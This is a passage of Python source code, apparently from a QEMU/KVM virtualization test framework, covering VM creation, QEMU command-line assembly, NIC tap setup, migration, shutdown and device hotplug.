elif p9_fs_driver == "proxy":
cmd += " proxy,id=local1,socket="
else:
p9_fs_driver = "local"
cmd += " local,id=local1,path=" + p9_export_dir
# security model is needed only for local fs driver
if p9_fs_driver == "local":
p9_security_model = params.get("9p_security_model")
if not p9_security_model:
p9_security_model = "none"
cmd += ",security_model=" + p9_security_model
elif p9_fs_driver == "proxy":
p9_socket_name = params.get("9p_socket_name")
if not p9_socket_name:
raise virt_vm.VMImageMissingError("Socket name not "
"defined")
cmd += p9_socket_name
p9_immediate_writeout = params.get("9p_immediate_writeout")
if p9_immediate_writeout == "yes":
cmd += ",writeout=immediate"
p9_readonly = params.get("9p_readonly")
if p9_readonly == "yes":
cmd += ",readonly"
devices.insert(StrDev('fsdev', cmdline=cmd))
dev = QDevice('virtio-9p-pci', parent_bus={'type': 'pci'})
dev.set_param('fsdev', 'local1')
dev.set_param('mount_tag', 'autotest_tag')
devices.insert(dev)
extra_params = params.get("extra_params")
if extra_params:
devices.insert(StrDev('extra', cmdline=extra_params))
bios_path = params.get("bios_path")
if bios_path:
devices.insert(StrDev('bios', cmdline="-bios %s" % bios_path))
disable_kvm_option = ""
if (devices.has_option("no-kvm")):
disable_kvm_option = "-no-kvm"
enable_kvm_option = ""
if (devices.has_option("enable-kvm")):
enable_kvm_option = "-enable-kvm"
if (params.get("disable_kvm", "no") == "yes"):
params["enable_kvm"] = "no"
if (params.get("enable_kvm", "yes") == "no"):
devices.insert(StrDev('nokvm', cmdline=disable_kvm_option))
logging.debug("qemu will run in TCG mode")
else:
devices.insert(StrDev('kvm', cmdline=enable_kvm_option))
logging.debug("qemu will run in KVM mode")
self.no_shutdown = (devices.has_option("no-shutdown") and
params.get("disable_shutdown", "no") == "yes")
if self.no_shutdown:
devices.insert(StrDev('noshutdown', cmdline="-no-shutdown"))
user_runas = params.get("user_runas")
if devices.has_option("runas") and user_runas:
devices.insert(StrDev('runas', cmdline="-runas %s" % user_runas))
if params.get("enable_sga") == "yes":
devices.insert(StrDev('sga', cmdline=add_sga(devices)))
if params.get("smartcard", "no") == "yes":
sc_chardev = params.get("smartcard_chardev")
sc_id = params.get("smartcard_id")
devices.insert(StrDev('smartcard',
cmdline=add_smartcard(devices, sc_chardev, sc_id)))
if params.get("enable_watchdog", "no") == "yes":
cmd = add_watchdog(devices,
params.get("watchdog_device_type", None),
params.get("watchdog_action", "reset"))
devices.insert(StrDev('watchdog', cmdline=cmd))
option_roms = params.get("option_roms")
if option_roms:
cmd = ""
for opt_rom in option_roms.split():
cmd += add_option_rom(help, opt_rom)
if cmd:
devices.insert(StrDev('ROM', cmdline=cmd))
return devices
def _nic_tap_add_helper(self, nic):
if nic.nettype == 'macvtap':
logging.info("Adding macvtap ifname: %s", nic.ifname)
utils_net.add_nic_macvtap(nic)
else:
nic.tapfds = utils_net.open_tap("/dev/net/tun", nic.ifname,
queues=nic.queues, vnet_hdr=True)
logging.debug("Adding VM %s NIC ifname %s to bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.nettype == 'bridge':
utils_net.add_to_bridge(nic.ifname, nic.netdst)
utils_net.bring_up_ifname(nic.ifname)
def _nic_tap_remove_helper(self, nic):
try:
if nic.nettype == 'macvtap':
logging.info("Remove macvtap ifname %s", nic.ifname)
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
else:
logging.debug("Removing VM %s NIC ifname %s from bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.tapfds:
for i in nic.tapfds.split(':'):
os.close(int(i))
if nic.vhostfds:
for i in nic.tapfds.split(':'):
os.close(int(i))
except TypeError:
pass
@error.context_aware
def create(self, name=None, params=None, root_dir=None,
timeout=CREATE_TIMEOUT, migration_mode=None,
migration_exec_cmd=None, migration_fd=None,
mac_source=None):
"""
Start the VM by running a qemu command.
All parameters are optional. If name, params or root_dir are not
supplied, the respective values stored as class attributes are used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:param migration_mode: If supplied, start VM for incoming migration
using this protocol (either 'rdma', 'x-rdma', 'rdma', 'tcp', 'unix' or 'exec')
:param migration_exec_cmd: Command to embed in '-incoming "exec: ..."'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param migration_fd: Open descriptor from machine should migrate.
:param mac_source: A VM object from which to copy MAC addresses. If not
specified, new addresses will be generated.
:raise VMCreateError: If qemu terminates unexpectedly
:raise VMKVMInitError: If KVM initialization fails
:raise VMHugePageError: If hugepage initialization fails
:raise VMImageMissingError: If a CD image is missing
:raise VMHashMismatchError: If a CD image hash has doesn't match the
expected hash
:raise VMBadPATypeError: If an unsupported PCI assignment type is
requested
:raise VMPAError: If no PCI assignable devices could be assigned
:raise TAPCreationError: If fail to create tap fd
:raise BRAddIfError: If fail to add a tap to a bridge
:raise TAPBringUpError: If fail to bring up a tap
:raise PrivateBridgeError: If fail to bring the private bridge
"""
error.context("creating '%s'" % self.name)
self.destroy(free_mac_addresses=False)
if name is not None:
self.name = name
self.devices = None # Representation changed
if params is not None:
self.params = params
self.devices = None # Representation changed
if root_dir is not None:
self.root_dir = root_dir
self.devices = None # Representation changed
name = self.name
params = self.params
root_dir = self.root_dir
# Verify the md5sum of the ISO images
for cdrom in params.objects("cdroms"):
cdrom_params = params.object_params(cdrom)
iso = cdrom_params.get("cdrom")
if iso:
iso = utils_misc.get_path(data_dir.get_data_dir(), iso)
if not os.path.exists(iso):
raise virt_vm.VMImageMissingError(iso)
compare = False
if cdrom_params.get("md5sum_1m"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"first MB of ISO file...")
actual_hash = utils.hash_file(iso, 1048576, method="md5")
expected_hash = cdrom_params.get("md5sum_1m")
compare = True
elif cdrom_params.get("md5sum"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"ISO file...")
actual_hash = utils.hash_file(iso, method="md5")
expected_hash = cdrom_params.get("md5sum")
compare = True
elif cdrom_params.get("sha1sum"):
logging.debug("Comparing expected SHA1 sum with SHA1 sum "
"of ISO file...")
actual_hash = utils.hash_file(iso, method="sha1")
expected_hash = cdrom_params.get("sha1sum")
compare = True
if compare:
if actual_hash == expected_hash:
logging.debug("Hashes match")
else:
raise virt_vm.VMHashMismatchError(actual_hash,
expected_hash)
# Make sure the following code is not executed by more than one thread
# at the same time
lockfile = open("/tmp/kvm-autotest-vm-create.lock", "w+")
fcntl.lockf(lockfile, fcntl.LOCK_EX)
try:
# Handle port redirections
redir_names = params.objects("redirs")
host_ports = utils_misc.find_free_ports(
5000, 6000, len(redir_names))
self.redirs = {}
for i in range(len(redir_names)):
redir_params = params.object_params(redir_names[i])
guest_port = int(redir_params.get("guest_port"))
self.redirs[guest_port] = host_ports[i]
# Generate basic parameter values for all NICs and create TAP fd
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
pa_type = nic_params.get("pci_assignable")
if pa_type and pa_type != "no":
device_driver = nic_params.get("device_driver",
"pci-assign")
if "mac" not in nic:
self.virtnet.generate_mac_address(nic["nic_name"])
mac = nic["mac"]
if self.pci_assignable is None:
self.pci_assignable = test_setup.PciAssignable(
driver=params.get("driver"),
driver_option=params.get("driver_option"),
host_set_flag=params.get("host_setup_flag"),
kvm_params=params.get("kvm_default"),
vf_filter_re=params.get("vf_filter_re"),
pf_filter_re=params.get("pf_filter_re"),
device_driver=device_driver)
# Virtual Functions (VF) assignable devices
if pa_type == "vf":
self.pci_assignable.add_device(device_type=pa_type,
mac=mac)
# Physical NIC (PF) assignable devices
elif pa_type == "pf":
self.pci_assignable.add_device(device_type=pa_type,
name=nic_params.get("device_name"))
else:
raise virt_vm.VMBadPATypeError(pa_type)
else:
# fill in key values, validate nettype
# note: make_create_command() calls vm.add_nic (i.e. on a
# copy)
if nic_params.get('netdst') == 'private':
nic.netdst = (test_setup.
PrivateBridgeConfig(nic_params).brname)
nic = self.add_nic(**dict(nic)) # implied add_netdev
if mac_source:
# Will raise exception if source doesn't
# have cooresponding nic
logging.debug("Copying mac for nic %s from VM %s"
% (nic.nic_name, mac_source.name))
nic.mac = mac_source.get_mac_address(nic.nic_name)
if nic.ifname in utils_net.get_net_if():
self.virtnet.generate_ifname(nic.nic_name)
if nic.nettype in ['bridge', 'network', 'macvtap']:
self._nic_tap_add_helper(nic)
if ((nic_params.get("vhost") == 'vhost=on') and
(nic_params.get("enable_vhostfd", "yes") == "yes")):
vhostfds = []
for i in xrange(int(nic.queues)):
vhostfds.append(str(os.open("/dev/vhost-net",
os.O_RDWR)))
nic.vhostfds = ':'.join(vhostfds)
elif nic.nettype == 'user':
logging.info("Assuming dependencies met for "
"user mode nic %s, and ready to go"
% nic.nic_name)
self.virtnet.update_db()
# Find available VNC port, if needed
if params.get("display") == "vnc":
self.vnc_port = utils_misc.find_free_port(5900, 6100)
# Find random UUID if specified 'uuid = random' in config file
if params.get("uuid") == "random":
f = open("/proc/sys/kernel/random/uuid")
self.uuid = f.read().strip()
f.close()
if self.pci_assignable is not None:
self.pa_pci_ids = self.pci_assignable.request_devs()
if self.pa_pci_ids:
logging.debug("Successfully assigned devices: %s",
self.pa_pci_ids)
else:
raise virt_vm.VMPAError(pa_type)
# Make qemu command
try:
self.devices = self.make_create_command()
logging.debug(self.devices.str_short())
logging.debug(self.devices.str_bus_short())
qemu_command = self.devices.cmdline()
except error.TestNAError:
# TestNAErrors should be kept as-is so we generate SKIP
# results instead of bogus FAIL results
raise
except Exception:
for nic in self.virtnet:
self._nic_tap_remove_helper(nic)
# TODO: log_last_traceback is being moved into autotest.
# use autotest.client.shared.base_utils when it's completed.
if 'log_last_traceback' in utils.__dict__:
utils.log_last_traceback('Fail to create qemu command:')
else:
utils_misc.log_last_traceback('Fail to create qemu'
'command:')
raise virt_vm.VMStartError(self.name, 'Error occurred while '
'executing make_create_command(). '
'Check the log for traceback.')
# Add migration parameters if required
if migration_mode in ["tcp", "rdma", "x-rdma"]:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (" -incoming " + migration_mode +
":0:%d" % self.migration_port)
elif migration_mode == "unix":
self.migration_file = "/tmp/migration-unix-%s" % self.instance
qemu_command += " -incoming unix:%s" % self.migration_file
elif migration_mode == "exec":
if migration_exec_cmd is None:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (' -incoming "exec:nc -l %s"' %
self.migration_port)
else:
qemu_command += (' -incoming "exec:%s"' %
migration_exec_cmd)
elif migration_mode == "fd":
qemu_command += ' -incoming "fd:%d"' % (migration_fd)
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "proxy":
proxy_helper_name = params.get("9p_proxy_binary",
"virtfs-proxy-helper")
proxy_helper_cmd = utils_misc.get_path(root_dir,
proxy_helper_name)
if not proxy_helper_cmd:
raise virt_vm.VMConfigMissingError(self.name,
"9p_proxy_binary")
p9_export_dir = params.get("9p_export_dir")
if not p9_export_dir:
raise virt_vm.VMConfigMissingError(self.name,
"9p_export_dir")
proxy_helper_cmd += " -p " + p9_export_dir
proxy_helper_cmd += " -u 0 -g 0"
p9_socket_name = params.get("9p_socket_name")
proxy_helper_cmd += " -s " + p9_socket_name
proxy_helper_cmd += " -n"
logging.info("Running Proxy Helper:\n%s", proxy_helper_cmd)
self.process = aexpect.run_bg(proxy_helper_cmd, None,
logging.info,
"[9p proxy helper]",
auto_close=False)
logging.info("Running qemu command (reformatted):\n%s",
qemu_command.replace(" -", " \\\n -"))
self.qemu_command = qemu_command
self.process = aexpect.run_bg(qemu_command, None,
logging.info, "[qemu output] ",
auto_close=False)
self.start_time = time.time()
# test doesn't need to hold tapfd's open
for nic in self.virtnet:
if nic.has_key('tapfds'): # implies bridge/tap
try:
for i in nic.tapfds.split(':'):
os.close(int(i))
# qemu process retains access via open file
# remove this attribute from virtnet because
# fd numbers are not always predictable and
# vm instance must support cloning.
del nic['tapfds']
# File descriptor is already closed
except OSError:
pass
if nic.has_key('vhostfds'):
try:
for i in nic.vhostfds.split(':'):
os.close(int(i))
del nic['vhostfds']
except OSError:
pass
# Make sure the process was started successfully
if not self.process.is_alive():
status = self.process.get_status()
output = self.process.get_output().strip()
migration_in_course = migration_mode is not None
unknown_protocol = "unknown migration protocol" in output
if migration_in_course and unknown_protocol:
e = VMMigrateProtoUnsupportedError(migration_mode, output)
else:
e = virt_vm.VMCreateError(qemu_command, status, output)
self.destroy()
raise e
# Establish monitor connections
self.monitors = []
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
try:
monitor = qemu_monitor.wait_for_create_monitor(self,
monitor_name, monitor_params, timeout)
except qemu_monitor.MonitorConnectError, detail:
logging.error(detail)
self.destroy()
raise
# Add this monitor to the list
self.monitors += [monitor]
# Create isa serial ports.
self.serial_ports = []
for serial in params.objects("isa_serials"):
self.serial_ports.append(serial)
# Create virtio_ports (virtio_serialports and virtio_consoles)
i = 0
self.virtio_ports = []
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
if port_params.get('virtio_port_chardev') == "spicevmc":
filename = 'dev%s' % port
else:
filename = self.get_virtio_port_filename(port)
port_name = port_params.get('virtio_port_name_prefix', None)
if port_name: # If port_name_prefix was used
port_name = port_name + str(i)
else: # Implicit name - port
port_name = port
if port_params.get('virtio_port_type') in ("console",
"virtio_console"):
self.virtio_ports.append(
qemu_virtio_port.VirtioConsole(port, port_name,
filename))
else:
self.virtio_ports.append(
qemu_virtio_port.VirtioSerial(port, port_name,
filename))
i += 1
# Get the output so far, to see if we have any problems with
# KVM modules or with hugepage setup.
output = self.process.get_output()
if re.search("Could not initialize KVM", output, re.IGNORECASE):
e = virt_vm.VMKVMInitError(
qemu_command, self.process.get_output())
self.destroy()
raise e
if "alloc_mem_area" in output:
e = virt_vm.VMHugePageError(
qemu_command, self.process.get_output())
self.destroy()
raise e
logging.debug("VM appears to be alive with PID %s", self.get_pid())
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
vhost_thread_pattern = params.get("vhost_thread_pattern",
r"\w+\s+(\d+)\s.*\[vhost-%s\]")
self.vhost_threads = self.get_vhost_threads(vhost_thread_pattern)
# Establish a session with the serial console
# Let's consider the first serial port as serial console.
# Note: requires a version of netcat that supports -U
try:
tmp_serial = self.serial_ports[0]
except IndexError:
raise virt_vm.VMConfigMissingError(name, "isa_serial")
self.serial_console = aexpect.ShellSession(
"nc -U %s" % self.get_serial_console_filename(tmp_serial),
auto_close=False,
output_func=utils_misc.log_line,
output_params=("serial-%s-%s.log" % (tmp_serial, name),),
prompt=self.params.get("shell_prompt", "[\#\$]"))
del tmp_serial
for key, value in self.logs.items():
outfile = "%s-%s.log" % (key, name)
self.logsessions[key] = aexpect.Tail(
"nc -U %s" % value,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(outfile,))
self.logsessions[key].set_log_file(outfile)
if params.get("paused_after_start_vm") != "yes":
# start guest
if self.monitor.verify_status("paused"):
try:
self.monitor.cmd("cont")
except qemu_monitor.QMPCmdError, e:
if ((e.data['class'] == "MigrationExpected") and
(migration_mode is not None)):
logging.debug("Migration did not start yet...")
else:
raise e
finally:
fcntl.lockf(lockfile, fcntl.LOCK_UN)
lockfile.close()
def wait_for_status(self, status, timeout, first=0.0, step=1.0, text=None):
"""
Wait until the VM status changes to specified status
:return: True in case the status has changed before timeout, otherwise
return None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param steps: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
"""
return utils_misc.wait_for(lambda: self.monitor.verify_status(status),
timeout, first, step, text)
def wait_until_paused(self, timeout):
"""
Wait until the VM is paused.
:return: True in case the VM is paused before timeout, otherwise
return None.
:param timeout: Timeout in seconds
"""
return self.wait_for_status("paused", timeout)
def wait_until_dead(self, timeout, first=0.0, step=1.0):
"""
Wait until VM is dead.
:return: True if VM is dead before timeout, otherwise returns None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param steps: Time to sleep between attempts in seconds
"""
return utils_misc.wait_for(self.is_dead, timeout, first, step)
def wait_for_shutdown(self, timeout=60):
"""
Wait until guest shuts down.
Helps until the VM is shut down by the guest.
:return: True in case the VM was shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.no_shutdown:
return self.wait_until_paused(timeout)
else:
return self.wait_until_dead(timeout, 1, 1)
def graceful_shutdown(self, timeout=60):
"""
Try to gracefully shut down the VM.
:return: True if VM was successfully shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.params.get("shutdown_command"):
# Try to destroy with shell command
logging.debug("Shutting down VM %s (shell)", self.name)
try:
if len(self.virtnet) > 0:
session = self.login()
else:
session = self.serial_login()
except (virt_vm.VMInterfaceIndexError), e:
try:
session = self.serial_login()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
try:
# Send the shutdown command
session.sendline(self.params.get("shutdown_command"))
if self.wait_for_shutdown(timeout):
return True
finally:
session.close()
def _cleanup(self, free_mac_addresses):
"""
Do cleanup works
.removes VM monitor files.
.process close
.serial_console close
.logsessions close
.delete tmp files
.free_mac_addresses, if needed
.delete macvtap, if needed
:param free_mac_addresses: Whether to release the VM's NICs back
to the address pool.
"""
self.monitors = []
if self.pci_assignable:
self.pci_assignable.release_devs()
self.pci_assignable = None
if self.process:
self.process.close()
if self.serial_console:
self.serial_console.close()
if self.logsessions:
for key in self.logsessions:
self.logsessions[key].close()
# Generate the tmp file which should be deleted.
file_list = [self.get_testlog_filename()]
file_list += qemu_monitor.get_monitor_filenames(self)
file_list += self.get_virtio_port_filenames()
file_list += self.get_serial_console_filenames()
file_list += self.logs.values()
for f in file_list:
try:
os.unlink(f)
except OSError:
pass
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
if free_mac_addresses:
for nic_index in xrange(0, len(self.virtnet)):
self.free_mac_address(nic_index)
for nic in self.virtnet:
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
:param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
:param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
"""
try:
# Is it already dead?
if self.is_dead():
return
logging.debug("Destroying VM %s (PID %s)", self.name,
self.get_pid())
kill_timeout = int(self.params.get("kill_timeout", "60"))
if gracefully:
self.graceful_shutdown(kill_timeout)
if self.is_dead():
logging.debug("VM %s down (shell)", self.name)
return
else:
logging.debug("VM %s failed to go down (shell)", self.name)
if self.monitor:
# Try to finish process with a monitor command
logging.debug("Ending VM %s process (monitor)", self.name)
try:
self.monitor.quit()
except qemu_monitor.MonitorError, e:
logging.warn(e)
else:
# Wait for the VM to be really dead
if self.wait_until_dead(5, 0.5, 0.5):
logging.debug("VM %s down (monitor)", self.name)
return
else:
logging.debug("VM %s failed to go down (monitor)",
self.name)
# If the VM isn't dead yet...
pid = self.process.get_pid()
logging.debug("Ending VM %s process (killing PID %s)",
self.name, pid)
utils_misc.kill_process_tree(pid, 9)
# Wait for the VM to be really dead
if utils_misc.wait_for(self.is_dead, 5, 0.5, 0.5):
logging.debug("VM %s down (process killed)", self.name)
return
# If all else fails, we've got a zombie...
logging.error("VM %s (PID %s) is a zombie!", self.name,
self.process.get_pid())
finally:
self._cleanup(free_mac_addresses)
@property
def monitor(self):
"""
Return the main monitor object, selected by the parameter main_monitor.
If main_monitor isn't defined, return the first monitor.
If no monitors exist, or if main_monitor refers to a nonexistent
monitor, return None.
"""
for m in self.monitors:
if m.name == self.params.get("main_monitor"):
return m
if self.monitors and not self.params.get("main_monitor"):
return self.monitors[0]
return None
def get_monitors_by_type(self, mon_type):
"""
Return list of monitors of mon_type type.
:param mon_type: desired monitor type (qmp, human)
"""
return [_ for _ in self.monitors if _.protocol == mon_type]
def get_peer(self, netid):
"""
Return the peer of netdev or network deivce.
:param netid: id of netdev or device
:return: id of the peer device otherwise None
"""
o = self.monitor.info("network")
network_info = o
if isinstance(o, dict):
network_info = o.get["return"]
netdev_peer_re = self.params.get("netdev_peer_re")
if not netdev_peer_re:
default_netdev_peer_re = "\s{2,}(.*?): .*?\\\s(.*?):"
logging.warning("Missing config netdev_peer_re for VM %s, "
"using default %s", self.name,
default_netdev_peer_re)
netdev_peer_re = default_netdev_peer_re
pairs = re.findall(netdev_peer_re, network_info, re.S)
for nic, tap in pairs:
if nic == netid:
return tap
if tap == netid:
return nic
return None
def get_ifname(self, nic_index=0):
"""
Return the ifname of a bridge/tap device associated with a NIC.
:param nic_index: Index of the NIC
"""
return self.virtnet[nic_index].ifname
def get_pid(self):
"""
Return the VM's PID. If the VM is dead return None.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process.
"""
try:
children = commands.getoutput("ps --ppid=%d -o pid=" %
self.process.get_pid()).split()
return int(children[0])
except (TypeError, IndexError, ValueError):
return None
def get_shell_pid(self):
"""
Return the PID of the parent shell process.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process.
"""
return self.process.get_pid()
def get_vnc_port(self):
"""
Return self.vnc_port.
"""
return self.vnc_port
def get_vcpu_pids(self, vcpu_thread_pattern):
"""
Return the list of vcpu PIDs
:return: the list of vcpu PIDs
"""
return [int(_) for _ in re.findall(vcpu_thread_pattern,
str(self.monitor.info("cpus")))]
def get_vhost_threads(self, vhost_thread_pattern):
"""
Return the list of vhost threads PIDs
:param vhost_thread_pattern: a regex to match the vhost threads
:type vhost_thread_pattern: string
:return: a list of vhost threads PIDs
:rtype: list of integer
"""
return [int(_) for _ in re.findall(vhost_thread_pattern %
self.get_pid(),
utils.system_output("ps aux"))]
def get_shared_meminfo(self):
"""
Returns the VM's shared memory information.
:return: Shared memory used by VM (MB)
"""
if self.is_dead():
logging.error("Could not get shared memory info from dead VM.")
return None
filename = "/proc/%d/statm" % self.get_pid()
shm = int(open(filename).read().split()[2])
# statm stores informations in pages, translate it to MB
return shm * 4.0 / 1024
def get_spice_var(self, spice_var):
"""
Returns string value of spice variable of choice or None
:param spice_var - spice related variable 'spice_port', ...
"""
return self.spice_options.get(spice_var, None)
@error.context_aware
def hotplug_vcpu(self, cpu_id=None, plug_command=""):
"""
Hotplug a vcpu, if not assign the cpu_id, will use the minimum unused.
the function will use the plug_command if you assigned it, else the
function will use the command automatically generated based on the
type of monitor
:param cpu_id the cpu_id you want hotplug.
"""
vcpu_threads_count = len(self.vcpu_threads)
plug_cpu_id = cpu_id
if plug_cpu_id is None:
plug_cpu_id = vcpu_threads_count
if plug_command:
vcpu_add_cmd = plug_command % plug_cpu_id
else:
if self.monitor.protocol == 'human':
vcpu_add_cmd = "cpu_set %s online" % plug_cpu_id
elif self.monitor.protocol == 'qmp':
vcpu_add_cmd = "cpu-add id=%s" % plug_cpu_id
try:
self.monitor.verify_supported_cmd(vcpu_add_cmd.split()[0])
except qemu_monitor.MonitorNotSupportedCmdError:
raise error.TestNAError("%s monitor not support cmd '%s'" %
(self.monitor.protocol, vcpu_add_cmd))
try:
cmd_output = self.monitor.send_args_cmd(vcpu_add_cmd)
except qemu_monitor.QMPCmdError, e:
return (False, str(e))
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
if len(self.vcpu_threads) == vcpu_threads_count + 1:
return(True, plug_cpu_id)
else:
return(False, cmd_output)
@error.context_aware
def hotplug_nic(self, **params):
"""
Convenience method wrapper for add_nic() and add_netdev().
:return: dict-like object containing nic's details
"""
nic_name = self.add_nic(**params)["nic_name"]
self.activate_netdev(nic_name)
self.activate_nic(nic_name)
return self.virtnet[nic_name]
@error.context_aware
def hotunplug_nic(self, nic_index_or_name):
"""
Convenience method wrapper for del/deactivate nic and netdev.
"""
# make sure we got a name
nic_name = self.virtnet[nic_index_or_name].nic_name
self.deactivate_nic(nic_name)
self.deactivate_netdev(nic_name)
self.del_nic(nic_name)
@error.context_aware
def add_netdev(self, **params):
"""
Hotplug a netdev device.
:param **params: NIC info. dict.
:return: netdev_id
"""
nic_name = params['nic_name']
nic = self.virtnet[nic_name]
nic_index = self.virtnet.nic_name_index(nic_name)
nic.set_if_none('netdev_id', utils_misc.generate_random_id())
nic.set_if_none('ifname', self.virtnet.generate_ifname(nic_index))
nic.set_if_none('nettype', 'bridge')
if nic.nettype in ['bridge', 'macvtap']: # implies tap
# destination is required, hard-code reasonable default if unset
# nic.set_if_none('netdst', 'virbr0')
# tapfd allocated/set in activate because requires system resources
nic.set_if_none('queues', '1')
ids = []
for i in range(int(nic.queues)):
ids.append(utils_misc.generate_random_id())
nic.set_if_none('tapfd_ids', ids)
elif nic.nettype == 'user':
pass # nothing to do
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_name,
nic.nettype)
return nic.netdev_id
@error.context_aware
def del_netdev(self, nic_index_or_name):
"""
Remove netdev info. from nic on VM, does not deactivate.
:param: nic_index_or_name: name or index number for existing NIC
"""
nic = self.virtnet[nic_index_or_name]
error.context("removing netdev info from nic %s from vm %s" % (
nic, self.name))
for propertea in ['netdev_id', 'ifname', 'queues',
'tapfds', 'tapfd_ids', 'vectors']:
if nic.has_key(propertea):
del nic[propertea]
def add_nic(self, **params):
"""
Add new or setup existing NIC, optionally creating netdev if None
:param **params: Parameters to set
:param nic_name: Name for existing or new device
:param nic_model: Model name to emulate
:param netdev_id: Existing qemu net device ID name, None to create new
:param mac: Optional MAC address, None to randomly generate.
"""
# returns existing or new nic object
nic = super(VM, self).add_nic(**params)
nic_index = self.virtnet.nic_name_index(nic.nic_name)
nic.set_if_none('vlan', str(nic_index))
nic.set_if_none('device_id', utils_misc.generate_random_id())
nic.set_if_none('queues', '1')
if not nic.has_key('netdev_id'):
# virtnet items are lists that act like dicts
nic.netdev_id = self.add_netdev(**dict(nic))
nic.set_if_none('nic_model', params['nic_model'])
nic.set_if_none('queues', params.get('queues', '1'))
if params.get("enable_msix_vectors") == "yes":
nic.set_if_none('vectors', 2 * int(nic.queues) + 1)
return nic
@error.context_aware
def activate_netdev(self, nic_index_or_name):
"""
Activate an inactive host-side networking device
:raise:: IndexError if nic doesn't exist
:raise:: VMUnknownNetTypeError: if nettype is unset/unsupported
:raise:: IOError if TAP device node cannot be opened
:raise:: VMAddNetDevError: if operation failed
"""
tapfds = []
nic = self.virtnet[nic_index_or_name]
error.context("Activating netdev for %s based on %s" %
(self.name, nic))
msg_sfx = ("nic %s on vm %s with attach_cmd " %
(self.virtnet[nic_index_or_name], self.name))
attach_cmd = "netdev_add"
if nic.nettype == 'bridge': # implies tap
error.context("Opening tap device node for %s " % nic.ifname,
logging.debug)
python_tapfds = utils_net.open_tap("/dev/net/tun",
nic.ifname,
queues=nic.queues,
vnet_hdr=False)
for i in range(int(nic.queues)):
error.context("Assigning tap %s to qemu by fd" %
nic.tapfd_ids[i], logging.info)
lsof_cmd = "lsof -a -p %s -Ff -- /dev/net/tun" % self.get_pid()
openfd_list = utils.system_output(lsof_cmd).splitlines()
self.monitor.getfd(int(python_tapfds.split(':')[i]),
nic.tapfd_ids[i])
n_openfd_list = utils.system_output(lsof_cmd).splitlines()
new_qemu_fd = list(set(n_openfd_list) - set(openfd_list))
if not new_qemu_fd:
err_msg = "Can't get the tap fd in qemu process!"
raise virt_vm.VMAddNetDevError(err_msg)
tapfds.append(new_qemu_fd[0].lstrip("f"))
nic.set_if_none("tapfds", ":".join(tapfds))
if not self.devices:
err_msg = "Can't add nic for VM which is not running."
raise virt_vm.VMAddNetDevError(err_msg)
if ((int(nic.queues)) > 1 and
',fds=' in self.devices.get_help_text()):
attach_cmd += " type=tap,id=%s,fds=%s" % (nic.device_id,
nic.tapfds)
else:
attach_cmd += " type=tap,id=%s,fd=%s" % (nic.device_id,
nic.tapfds)
error.context("Raising interface for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.bring_up_ifname(nic.ifname)
error.context("Raising bridge for " + msg_sfx + attach_cmd,
logging.debug)
# assume this will puke if netdst unset
if not nic.netdst is None:
utils_net.add_to_bridge(nic.ifname, nic.netdst)
elif nic.nettype == 'macvtap':
pass
elif nic.nettype == 'user':
attach_cmd += " user,id=%s" % nic.device_id
elif nic.nettype == 'none':
attach_cmd += " none"
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_index_or_name,
nic.nettype)
if nic.has_key('netdev_extra_params'):
attach_cmd += nic.netdev_extra_params
error.context("Hotplugging " + msg_sfx + attach_cmd, logging.debug)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(attach_cmd)
else:
self.monitor.send_args_cmd(attach_cmd, convert=False)
network_info = self.monitor.info("network")
if nic.device_id not in network_info:
# Don't leave resources dangling
self.deactivate_netdev(nic_index_or_name)
raise virt_vm.VMAddNetDevError(("Failed to add netdev: %s for " %
nic.device_id) + msg_sfx +
attach_cmd)
@error.context_aware
def activate_nic(self, nic_index_or_name):
"""
Activate an VM's inactive NIC device and verify state
:param nic_index_or_name: name or index number for existing NIC
"""
error.context("Retrieving info for NIC %s on VM %s" % (
nic_index_or_name, self.name))
nic = self.virtnet[nic_index_or_name]
device_add_cmd = "device_add"
if nic.has_key('nic_model'):
device_add_cmd += ' driver=%s' % nic.nic_model
